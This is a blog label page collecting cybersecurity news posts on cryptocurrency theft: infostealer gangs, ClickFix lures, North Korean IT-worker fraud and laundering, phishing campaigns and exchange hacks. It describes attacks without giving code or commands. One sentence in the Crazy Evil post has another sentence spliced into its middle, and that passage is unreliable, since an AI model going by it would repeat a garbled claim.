Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label cryptocurrency theft. Show all posts
social media scams
cryptocurrency theft cybercrime syndicate information stealers malware social media scams

Crazy Evil Gang Strikes Crypto Sector with StealC, AMOS, and Angel Drainer Malware

 


A Russian-speaking cybercrime syndicate, Crazy Evil, has been tied to more than 10 active social media scams, employing diverse tactics to trick victims into installing malicious software such as StealC, Atomic macOS Stealer (AMOS), and Angel Drainer.

"Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil operates a sophisticated network of traffers — social engineering specialists tasked with redirecting legitimate traffic to malicious phishing sites," stated Recorded Future's Insikt Group in their analysis.

The group's varied malware arsenal indicates that its targets include both Windows and macOS users, posing a significant threat to the decentralized finance sector.

Crazy Evil, active since at least 2021, mainly operates as a traffer team, redirecting legitimate traffic to fraudulent landing pages controlled by other criminal entities. It is allegedly managed by a figure known as @AbrahamCrazyEvil on Telegram, where the group has over 4,800 subscribers (@CrazyEvilCorp).

Unlike typical scams that create counterfeit shopping websites for fraudulent transactions, Crazy Evil focuses on stealing digital assets, including NFTs, cryptocurrencies, payment card information, and online banking credentials. The group is believed to have generated over $5 million in illicit revenue, impacting thousands of devices worldwide.

The group's notoriety has grown following exit scams involving two other cybercrime outfits—Markopolo and CryptoLove—which were previously associated with a ClickFix campaign involving fake Google Meet pages in October 2024.

"Crazy Evil explicitly targets the cryptocurrency sector with custom spear-phishing lures," Recorded Future noted. "Crazy Evil traffers often spend days or even weeks scouting operations, identifying targets, and initiating engagements."

In addition to orchestrating attacks that deliveThe group's notoriety has grown following exit scams involving two other cybercrime outfits—Markopolo and CryptoLover information stealers and wallet-draining malware, the group's leaders offer training materials and guidance for traffers, alongside an affiliate structure to delegate operations.

Crazy Evil is the second cybercrime group after Telekopye to be exposed in recent years, with its operations centered around Telegram. New recruits are guided by a Telegram bot controlled by the threat actor to various private channels, such as:

  • Payments: Announcing earnings for traffers
  • Logbar: Tracking information-stealer attacks and stolen data
  • Info: Offering regular updates on administrative and technical matters
  • Global Chat: A central space for communication, from work-related topics to casual discussions
The group operates through six sub-teams—AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND—each responsible for specific scams involving the installation of malicious tools via fake websites.

"As Crazy Evil continues to thrive, other cybercriminal groups are likely to mimic its tactics, urging security teams to stay alert to avoid large-scale breaches and loss of trust within the cryptocurrency, gaming, and software sectors," said Recorded Future.

This revelation follows the discovery of a traffic distribution system (TDS) named TAG-124, which overlaps with activity clusters linked to multiple threat groups, including Rhysida ransomware, Interlock ransomware, and SocGholish. This TDS is used in initial infection chains to distribute malware, such as the Remcos RAT and CleanUpLoader, which serves as a conduit for both Rhysida and Interlock ransomware.

"TAG-124 is composed of compromised WordPress sites, actor-controlled payload servers, and additional components," explained Recorded Future. "When specific criteria are met, these sites display fake Google Chrome update landing pages, leading to malware infections."

The use of TAG-124 further links Rhysida and Interlock ransomware strains, with newer variants employing the ClickFix technique, which instructs visitors to execute a command copied to their clipboard to trigger the malware infection.

Compromised WordPress sites, totaling over 10,000, have been used to distribute AMOS and SocGholish as part of client-side attacks.

"JavaScript loaded in the user's browser generates a fake page within an iframe," said researcher Himanshu Anand. "Attackers exploit outdated WordPress versions and plugins to avoid detection by websites lacking client-side monitoring tools."

Additionally, threat actors have leveraged the trust in platforms like GitHub to distribute malicious installers leading to the deployment of Lumma Stealer and other payloads, including SectopRAT, Vidar Stealer, and Cobalt Strike Beacon.

Trend Micro highlighted that this activity shares similarities with the tactics used by the threat actor Stargazer Goblin, known for utilizing GitHub repositories for payload distribution. However, the key difference is that the infection chain begins with compromised websites that redirect to malicious GitHub release links.

"The Lumma Stealer distribution method is evolving, with the attacker now using GitHub repositories to host malware," said security researchers Buddy Tancio, Fe Cureg, and Jovit Samaniego.

"The malware-as-a-service (MaaS) model makes it easier for cybercriminals to execute sophisticated cyberattacks, simplifying the spread of threats like Lumma Stealer."

In a comment to The Hacker News, Antonis Terefos, a reverse engineer at Check Point Research, noted that the Stargazer Goblin group has been observed "shifting from Atlantida Stealer to Lumma, and testing other stealers."
Read more »
South Korea
cryptocurrency cryptocurrency theft cyber espionage Cyber Security IT Industry North Korea North Korea Hackers South Korea

Sanctions Imposed on North Korean Cyber Activities Supporting Nuclear Ambitions

 

South Korea has announced sanctions against 15 North Korean nationals and the Chosun Geumjeong Economic Information Technology Exchange Corporation for orchestrating schemes that finance North Korea’s nuclear weapons and missile programs. These measures target a global network involved in IT job fraud, cryptocurrency theft, and cyberattacks. 

The sanctioned individuals are linked to the 313th General Bureau, a division of North Korea’s Ministry of Munitions Industry. This bureau oversees the production and development of weapons and ballistic missiles. According to South Korea’s Peninsula Policy Bureau, these operatives are dispatched to countries such as China, Russia, Southeast Asia, and Africa. Using fake identities, they secure positions in international IT companies, generating revenue funneled back to the regime. 

Central to this operation is the Chosun Geumjeong Economic Information Technology Exchange Corporation. This organization plays a critical role by deploying IT professionals abroad and channeling significant financial resources to North Korea’s military projects. In recent years, North Korean operatives have increasingly infiltrated Western companies by posing as IT workers. This tactic not only generates revenue for the regime but also enables cyber espionage and theft. These workers have been found installing malware, stealing sensitive company data, and misappropriating funds. Some have even attempted to infiltrate secure software development environments. 

Despite the gravity of these actions, the stigma associated with hiring fraudulent workers has led many companies to keep such breaches private, leaving the true scope of the issue largely unknown. Additionally, South Korea accuses North Korea of being a major player in global cryptocurrency theft. A 2024 United Nations report found that North Korean hackers carried out 58 cyberattacks against cryptocurrency firms between 2017 and 2023, amassing approximately $3 billion in stolen funds. North Korean nationals have also reportedly violated international sanctions by earning income through employment in various industries, including construction and hospitality. 

These activities pose significant risks to the global cybersecurity landscape and international stability. South Korea asserts that the funds generated through these operations directly support North Korea’s nuclear and missile programs, emphasizing the need for a unified international response. By imposing these sanctions, South Korea aims to disrupt North Korea’s illicit financial networks and mitigate the broader risks posed by its cyber activities. 

This marks a crucial step in the global effort to counter the threats associated with Pyongyang’s nuclear ambitions and its exploitation of cyberspace for financial gain.
Read more »
Scammer
AWS Crypto Phishing cryptocurrency cryptocurrency theft Cyber Attacks Fake Emails Ledger Phishing scam Scammer

Ledger Phishing Scam Targets Cryptocurrency Wallets

 


A sophisticated phishing email campaign has emerged, targeting cryptocurrency users by impersonating Ledger, a prominent hardware wallet provider. These fraudulent emails claim that the recipient’s Ledger wallet seed phrase — also known as a recovery or mnemonic seed — has been compromised. In an attempt to secure their funds, users are directed to a so-called “secure verification tool” where they are asked to confirm their seed phrase. The phishing emails appear convincing, offering a “Verify my recovery phrase” button. Clicking this button redirects victims through an Amazon Web Services (AWS) website to a fake domain, “ledger-recovery[.]info.”

Once users enter their seed phrase on this page, the attackers capture the information, granting them full access to the victims’ cryptocurrency wallets. A recovery phrase, typically consisting of 12 or 24 random words, acts as the key to accessing a wallet’s funds. The importance of keeping this phrase private and offline cannot be overstated. By stealing these phrases, the attackers gain control of the wallets and can siphon all funds, leaving victims with no recourse.

To increase the scam’s credibility, the phishing site includes several deceptive features. For example, it accepts only valid seed phrase words from a predetermined list of 2,048 options. Regardless of the entered data, the site falsely informs users that their phrase is incorrect, encouraging them to re-enter their information multiple times and ensuring the attackers receive accurate details.

The Evolving Nature of Phishing Scams

This phishing attempt highlights the evolving sophistication of such scams. In the past, phishing emails were often marred by poor grammar or clumsy wording, making them easier to spot. However, with advancements in generative artificial intelligence, scammers can now produce polished and professional-looking messages. In this instance, one of the few red flags was the use of the SendGrid email marketing platform and the redirection through an AWS website, which sharp-eyed recipients might notice.

While it remains unclear how many individuals fell victim to this scheme, any user who shared their seed phrase likely lost their funds permanently. This incident underscores the importance of exercising caution and maintaining strict security protocols when handling sensitive information like recovery phrases.

How to Protect Your Cryptocurrency Wallet

Cryptocurrency users are advised to verify communications directly through official sources and avoid clicking on links in unsolicited emails. Recovery phrases should never be shared online, as doing so compromises the entire wallet’s security. With scams becoming increasingly sophisticated, vigilance and education are crucial in safeguarding digital assets.

Read more »
spear-phishing
Check Point research copyright scam cryptocurrency theft Cybersecurity Detection Infostealer malware phishing protection Rhadamanthys malware spear-phishing

Global Companies Targeted by "CopyR(ight)hadamantys" Phishing Scam Using Advanced Infostealer Malware

 

Hundreds of organizations worldwide have recently fallen victim to a sophisticated spear-phishing campaign, where emails falsely claiming copyright infringement are used to deliver an advanced infostealer malware.

Since July, Check Point Research has tracked the distribution of these emails across regions like the Americas, Europe, and Southeast Asia. Each email originates from a unique domain, and hundreds of Check Point’s clients have been targeted, suggesting the campaign's scope may be even broader.

The emails are designed to provoke recipients into downloading Rhadamanthys, a powerful infostealer capable of extracting sensitive data, such as cryptocurrency wallet information. Check Point researchers refer to the campaign as "CopyR(ight)hadamantys" and note the use of automated tools to send emails from different addresses. This automation can lead to awkward results, such as emails written in incorrect languages, limiting the emails’ ability to impersonate recognizable brands effectively. Roughly 70% of impersonated companies belong to the tech or media and entertainment sectors, including Check Point itself.

The phishing emails claim that the recipient has violated copyright laws by posting unauthorized content online. According to Sergey Shykevich, threat intelligence manager at Check Point, these accusations often cause recipients to question if they mistakenly used copyrighted material, increasing the chance they'll download the malware.

Recipients are directed to download a password-protected file, which contains a link leading to Dropbox or Discord. This file holds a decoy document, a legitimate program, and a malicious DLL (dynamic link library) that installs Rhadamanthys. Rhadamanthys stands out as one of the most sophisticated information-stealing tools sold on the dark web, priced around $1,000—significantly higher than other infostealers, which typically range from $100 to $200. Rhadamanthys is known for its modularity, obfuscation, and stealth, making detection much more challenging.

One notable feature of Rhadamanthys is its machine-learning-based OCR (optical character recognition) component. While limited in capability—it struggles with complex fonts and handwriting—this feature allows it to extract information from images and PDF files. The OCR module in the current campaign contains a dictionary of words tied to Bitcoin wallet security, suggesting a focus on cryptocurrency theft.

The CopyR(ight)hadamantys campaign aligns with financially motivated tactics, but Rhadamanthys has also been linked to state-sponsored actors, including Iran’s Void Manticore and the pro-Palestinian Handala group. Organizations are advised to enhance phishing defenses, though this campaign has an additional, unusual feature.

Once deployed, the malicious DLL creates a much larger file in the user’s Documents folder, disguised as a Firefox component. This larger version, though identical in function, uses an "overlay" of excess data, which serves two purposes: altering the file’s hash value, and potentially avoiding antivirus detection by exploiting a tendency of some programs to skip scanning large files.

According to Shykevich, organizations should monitor unusually large files downloaded via email, though legitimate files may also be large. He believes implementing effective download rules could help combat this tactic.
Read more »
Web3 news
crpto theft cryptocurrency scam cryptocurrency theft Cyber secu Google Play fake apps Latest Cybersecurity news Web3 news

Crypto Wallet App on Google Play Steals $70,000 from Mobile Users

 

A fake crypto wallet draining app on Google Play has stolen USD 70,000 from users, making it the first case where mobile users were specifically targeted by such a scam. The app stayed active for several months before being discovered, according to a report from Check Point Research. 

The app pretended to be a real crypto wallet service, tricking more than 10,000 users into downloading it. What made the scam effective was its professional appearance, which included consistent branding and fake positive reviews. These tactics helped the app rank high in Google Play’s search results, making it seem trustworthy to people looking for a secure place to store their cryptocurrency. 

Once users installed the app, it was able to quietly drain funds from their wallets without being noticed right away. This case stands out because, up until now, most crypto wallet attacks have focused on desktop or browser-based platforms. This marks a shift, as cybercriminals are now targeting the growing number of people who use mobile platforms for crypto transactions. 

The app’s ability to avoid detection for such a long time shows how advanced cybercriminal tactics have become. It also highlights the need for greater caution among users when downloading apps, even from trusted platforms like Google Play. This scam underscores the importance of stronger security measures for mobile transactions, such as using verified wallets and enabling two-factor authentication. 

It also calls attention to the need for better app screening by platforms like Google Play to prevent such scams from reaching users in the first place. Though the amount stolen may seem small compared to other crypto thefts, this case is significant because it shows how cybercriminals are adapting to target mobile users as cryptocurrency becomes more popular.
Read more »
data security
Bounty CERT-In Crypto Funds cryptocurrency cryptocurrency theft Customer Information Cyber Attacks data security

WazirX Responds to Major Cyberattack with Trading Halt and Bounty Program

 

In the wake of a significant cyberattack, WazirX, one of India’s foremost cryptocurrency exchanges, has taken drastic measures to mitigate the damage. The exchange announced a halt in trading and introduced a bounty program aimed at recovering stolen assets. This attack has severely impacted their ability to maintain 1:1 collateral with assets, necessitating immediate action. 

In a series of posts on X, WazirX detailed their response to the breach. They have filed a police complaint and reported the incident to the Financial Intelligence Unit (FIU) and CERT-In. Co-founder Nischal Shetty emphasized the urgency of the situation, stating that the exchange is reaching out to over 500 other exchanges to block the identified addresses associated with the stolen funds. This broad collaboration is essential as the stolen assets move through various platforms. 

To further their recovery efforts, WazirX is launching a bounty program to incentivize individuals and entities to help freeze or recover the stolen assets. This initiative is part of a broader strategy to trace the stolen funds and enhance the security measures of the exchange. The team is also consulting with several expert groups specializing in cryptocurrency transaction tracking to provide continuous monitoring and support during the recovery process. The exchange expressed gratitude for the support from the broader Web3 ecosystem, underscoring the need for a collective effort to resolve the issue and maintain the integrity of the Web3 community. 

Shetty mentioned that the team is conducting a thorough analysis to understand the extent of the damage caused by the attack. This analysis is crucial for developing an effective recovery plan and ensuring that all possible measures are taken to protect customer funds. In addition to their internal efforts, WazirX is working closely with forensic experts and law enforcement agencies to identify and apprehend the perpetrators. This collaboration aims to ensure that those responsible are brought to justice and that as many stolen assets as possible are recovered. 

The cyberattack has resulted in a substantial loss of approximately $235 million, making it one of the largest hacks of a centralized exchange in recent history. Crypto investigator ZachXBT revealed that the main attacker’s wallet still holds over $104 million in funds, which have yet to be offloaded. 

This highlights the ongoing challenges and complexities of securing digital assets in the ever-evolving cryptocurrency landscape. WazirX’s proactive measures and the support from the broader community will be crucial in navigating this crisis and reinforcing the security frameworks essential for the future of cryptocurrency exchanges.
Read more »
North Korea Hackers
Crypto Hacking cryptocurrency cryptocurrency theft Cyber Security Finance North Korea Hackers

The Week of Crypto Platform Breaches: Prisma Finance Incident Highlights

 

The past week witnessed a series of bewildering events in the realm of cryptocurrency, marked by breaches on two prominent platforms that left the crypto community grappling with perplexing motives and unexpected outcomes. 

The first incident unfolded on Tuesday evening when the Munchables blockchain-based game fell victim to an attack, resulting in the theft of approximately $62 million worth of cryptocurrency. Initial speculation pointed towards North Korea-linked hackers, given the country's history of targeting cryptocurrency platforms for financial gain. However, the situation took an unexpected turn when the alleged perpetrator voluntarily returned the stolen funds without any ransom demands. 

In a surprising twist, Munchables shared that the individual behind the attack had relinquished access to the private keys containing the stolen funds, expressing gratitude for their cooperation. Despite this resolution, questions lingered about the circumstances surrounding the incident, including the attacker's identity and motives, prompting calls for enhanced security measures within the crypto community. Shortly thereafter, another breach occurred on Thursday evening, this time affecting Prisma Finance, a popular decentralized finance (DeFi) platform, which suffered a loss of approximately $11.6 million. 

However, the aftermath of this breach was marked by cryptic messages from the hacker, who claimed the attack was a "white hat" endeavour aimed at highlighting vulnerabilities in the platform's smart contracts. The hacker, whose identity remained undisclosed, reached out to Prisma Finance seeking to return the stolen funds and engaging in a discourse about smart contract auditing and developer responsibilities. 

Despite the hacker's apparent altruistic intentions, the incident underscored the importance of rigorous security measures and comprehensive audits in the DeFi space. Prisma Finance later released a post-mortem report detailing the flash loan attack that led to the breach, shedding light on the exploitation of vulnerabilities in the platform. The report emphasized ongoing efforts to investigate the incident and ensure the safety of users' funds, highlighting the collaborative nature of the crypto community in addressing security breaches. 

These breaches come against the backdrop of heightened scrutiny of cyberattacks on cryptocurrency platforms, with a recent United Nations report identifying North Korean hackers as key perpetrators. The report highlighted a staggering $3 billion in illicit gains attributed to North Korean cyberattacks over a six-year period, underscoring the persistent threat posed by state-sponsored hackers in the crypto space. 

As the investigation into these breaches continues, the crypto community remains vigilant, emphasizing the importance of robust security measures and proactive collaboration to safeguard against future threats. While the motives behind these breaches may remain shrouded in mystery, the incidents serve as a stark reminder of the ever-present risks associated with digital assets and the imperative of maintaining heightened security protocols in the evolving landscape of cryptocurrency.
Read more »
Tornado Cash
Axie Infinity cryptocurrency theft Cyber Crime decentralized mixers Horizon Bridge law enforcement actions Lazarus Group North Korean Hackers Sinbad.io Tornado Cash

Lazarus Group Hackers Resurface Utilizing Tornado Cash for Money Laundering

 

The Lazarus hacking group from North Korea is reported to have reverted to an old tactic to launder $23 million obtained during an attack in November. According to investigators at Elliptic, a blockchain research company, the funds, which were part of the $112.5 million stolen from the HTX cryptocurrency exchange, have been laundered through the Tornado Cash mixing service.

Elliptic highlighted the significance of this move, noting that Lazarus had previously switched to Sinbad.io after U.S. authorities sanctioned Tornado Cash in August 2022. However, Sinbad.io was later sanctioned in November. Elliptic observed that Lazarus Group appears to have resumed using Tornado Cash to obscure the trail of their transactions, with over $23 million laundered through approximately 60 transactions.

The researchers explained that this shift in behavior likely stems from the limited availability of large-scale mixers following law enforcement actions against services like Sinbad.io and Blender.io. Despite being sanctioned, Tornado Cash continues to operate due to its decentralized nature, making it immune to seizure and shutdown like centralized mixers.

Elliptic has been monitoring the movement of the stolen $112.5 million since HTX attributed the incident to Lazarus. The funds remained dormant until March 13 when they were observed passing through Tornado Cash, corroborated by other blockchain security firms.

North Korean hackers utilize services such as Tornado Cash and Sinbad.io to conceal the origins of their ill-gotten gains and convert them into usable currency, aiding the regime in circumventing international sanctions related to its weapons programs, as per U.S. government claims.

According to the U.S. Treasury Department, North Korean hackers have utilized Sinbad and its precursor Blender.io to launder a portion of the $100 million stolen from Atomic Wallet customers in June, as well as substantial amounts from high-profile crypto thefts like those from Axie Infinity and Horizon Bridge.

Researchers estimate that North Korean groups pilfered around $1.7 billion worth of cryptocurrency in 2022 and approximately $1 billion in 2023. The Lazarus Group, operational for over a decade, has reportedly stolen over $2 billion worth of cryptocurrency to finance North Korea's governmental activities, including its weapons programs, as stated by U.S. officials. The group itself faced U.S. sanctions in 2019.
Read more »
security measures
Axie Infinity co-founder crypto community cryptocurrency theft Cyber Security Cybersecurity Breach Digital Assets Hackers personal accounts security measures

Hackers Steal Nearly $10 Million from Axie Infinity Co-founder’s Personal Accounts

 

A significant amount of cryptocurrency, valued at nearly $10 million, has been reported stolen from personal accounts belonging to Jeff "Jihoz" Zirlin, one of the co-founders associated with the video game Axie Infinity and its affiliated Ronin Network.

According to reports, Zirlin's wallets were compromised, resulting in the theft of 3,248 ethereum coins, equivalent to approximately $9.7 million. Zirlin took to social media to confirm the incident, stating that two of his accounts had been breached. 

However, he emphasized that the attack solely targeted his personal accounts and did not affect the validation or operations of the Ronin chain or Axie Infinity,as reiterated by Aleksander Larsen, another co-founder of the Ronin Network.

The method through which the intruders gained access to Zirlin's wallets remains unclear. The Ronin Network serves as the underlying infrastructure for Axie Infinity, a game renowned for its play-to-earn model based on ethereum, particularly popular in Southeast Asia. 

Notably, the system had previously fallen victim to a $600 million cryptocurrency heist in March 2022, an attack attributed by U.S. prosecutors to the Lazarus Group, a cybercrime operation allegedly backed by North Korea.

Analysts tracking the recent theft traced the stolen funds to activity on Tornado Cash, a cryptocurrency mixer designed to obfuscate the origin of funds. It's worth noting that Lazarus had previously utilized this mixer to launder proceeds from the 2022 hack. The U.S. government, in response, had separately imposed sanctions on Tornado Cash.

Blockchain investigator PeckShield described the incident as a "wallet compromise," indicating a breach in security measures. Despite the breach, Zirlin assured stakeholders of the stringent security protocols in place for all activities related to the Ronin chain.
Read more »
Subscribe to: Posts (Atom)